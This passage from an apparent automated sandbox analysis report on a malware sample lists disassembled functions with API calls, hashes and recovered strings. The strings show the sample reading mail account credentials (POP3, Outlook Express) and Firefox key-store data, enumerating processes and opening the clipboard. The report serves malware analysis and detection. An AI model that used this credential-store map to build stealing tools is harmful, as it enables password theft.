                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Library$FreeLoad
                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                            • API String ID: 2449869053-232097475
                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                            Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wcsstr.MSVCRT ref: 0040426A
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                            • strchr.MSVCRT ref: 004042F6
                                            • strlen.MSVCRT ref: 0040430A
                                            • sprintf.MSVCRT ref: 0040432B
                                            • strchr.MSVCRT ref: 0040433C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                            • String ID: %s@gmail.com$www.google.com
                                            • API String ID: 3866421160-4070641962
                                            • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                            • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                            Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strchr.MSVCRT ref: 004100E4
                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                            • _mbscat.MSVCRT ref: 0041014D
                                            • memset.MSVCRT ref: 00410129
                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                            • memset.MSVCRT ref: 00410171
                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                            • _mbscat.MSVCRT ref: 00410197
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                            • String ID: \systemroot
                                            • API String ID: 912701516-1821301763
                                            • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                            • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                            Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                            • strchr.MSVCRT ref: 0040327B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringstrchr
                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                            • API String ID: 1348940319-1729847305
                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                            Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                            • API String ID: 3510742995-3273207271
                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                            Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                            • GetDC.USER32(00000000), ref: 004072FB
                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                            • String ID:
                                            • API String ID: 1999381814-0
                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                            Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                            • API String ID: 1297977491-3883738016
                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                            Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: __aulldvrm$__aullrem
                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                            • API String ID: 643879872-978417875
                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                            Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040810E
                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                            • API String ID: 524865279-2190619648
                                            • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                            • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                            Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                              • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                              • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                              • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                              • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                              • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                            • CloseHandle.KERNEL32(?), ref: 00444206
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                            • String ID: ACD
                                            • API String ID: 1886237854-620537770
                                            • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                            • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                            • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                            • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                            Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004091EC
                                            • sprintf.MSVCRT ref: 00409201
                                              • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                              • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                              • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                            • SetWindowTextA.USER32(?,?), ref: 00409228
                                            • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                            • String ID: caption$dialog_%d
                                            • API String ID: 2923679083-4161923789
                                            • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                            • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                            • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                            • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                            Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                            Download Yara Rule
                                            APIs
                                            • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                            • memset.MSVCRT ref: 00410246
                                            • memset.MSVCRT ref: 00410258
                                              • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                            • memset.MSVCRT ref: 0041033F
                                            • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                            • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                            • String ID:
                                            • API String ID: 3974772901-0
                                            • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                            • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                            • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                            • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                            Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wcslen.MSVCRT ref: 0044406C
                                            • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                              • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                            • strlen.MSVCRT ref: 004440D1
                                              • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                              • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                            • String ID:
                                            • API String ID: 577244452-0
                                            • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                            • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                            Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040C02D
                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,74DF0A60), ref: 00408EBE
                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408E31
                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                            • API String ID: 2726666094-3614832568
                                            • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                            • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                            Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                            • String ID:
                                            • API String ID: 2014771361-0
                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                            Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                            Strings
                                            Memory Dump Source
